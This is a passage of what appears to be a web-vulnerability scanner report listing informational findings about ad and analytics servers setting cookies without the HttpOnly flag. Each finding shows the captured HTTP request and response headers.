GET /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=ctst

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 62

CN.ad.lotame.tags={"Profile": {"Audiences": {"Audience":[]}}};

11.34. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&_dc_ck=try HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT
Date: Tue, 11 Jan 2011 13:27:09 GMT
Server: GFE/2.0
Expires: Tue, 11 Jan 2011 13:27:09 GMT

GIF89a.............!.......,...........L..;

11.35. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 844
Set-Cookie: id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 03:23:26 GMT
Expires: Wed, 12 Jan 2011 03:23:26 GMT
Connection: close

document.write('<!-- BEGIN DIMESTORE TAG -->\n');

var projectid = 2621;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B2347
...[SNIP]...

11.36. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;233079667;13533154;h?http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart
Set-Cookie: id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT
Date: Wed, 12 Jan 2011 03:24:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.37. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/wiredcom.dart/threatlevel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.intel.com/consumer/products/processors/corei5.htm?dfaid=1&crtvid=39900309
Set-Cookie: id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:23:22 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.38. http://ad.insightexpressai.com/adserver/adServer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.insightexpressai.com
Path:   /adserver/adServer.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/adServer.aspx?publisherID=338 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:04:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIControlCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBannerCounter170474=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:04:02 GMT
Connection: close
Content-Length: 9

//170474

11.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 11 Jan 2011 22:45:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Fri, 11-Feb-2011 22:45:46 GMT; path=/
Set-Cookie: i_1=46:572:479:0:0:36939:1294785946:L; expires=Thu, 10-Feb-2011 22:45:46 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


11.40. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=2127270684&c7=http%3A%2F%2Fdownload.cnet.com%2F8301-2007_4-20027809-12.html%3Ftag%3Dmncol%3Btitle&c8=Android%20lands%20cloud%20security%20from%20Trend%20Micro%20%7C%&c9=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.41. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:55 GMT
Connection: close


11.42. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.pctools.com/spyware-doctor-antivirus/?ref=display-cnet&utm_source=download.com&utm_medium=banner&utm_content=all&utm_campaign=US_SECTARG_sdav_300_03_11-09
Server: Microsoft-IIS/7.5
Set-Cookie: E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:53 GMT
Connection: close


11.43. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-27742/Type-0/f4bbb00d-1a47-45b5-bf52-f968c23d96e3.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_000000087871816=4165551
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:26 GMT
Connection: close


11.44. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922091&Page=&PluID=0&Pos=8865\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-281/Type-0/7b4b3e72-c3e8-4733-aa25-3c5dffe10972.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fUFGa5OV02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8865\=4164202
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:41 GMT
Connection: close


11.45. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:14 GMT
Connection: close


11.46. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:24 GMT
Connection: close
Content-Length: 0


11.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922091&PluID=0&w=300&h=600&ord=3092481&ncu=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/f%3B232232804%3B0-0%3B1%3B13500656%3B4252-336/280%3B39182405/39200192/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsG; B2=83xP08y8ysF7gi30820wsG; C3=0u3F8y8ysF0000040_0uO9820wsG0000002_; D3=0u3F00358y8ysF0uO9002P820wsG; E2=0a+r820wsG09MY8y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
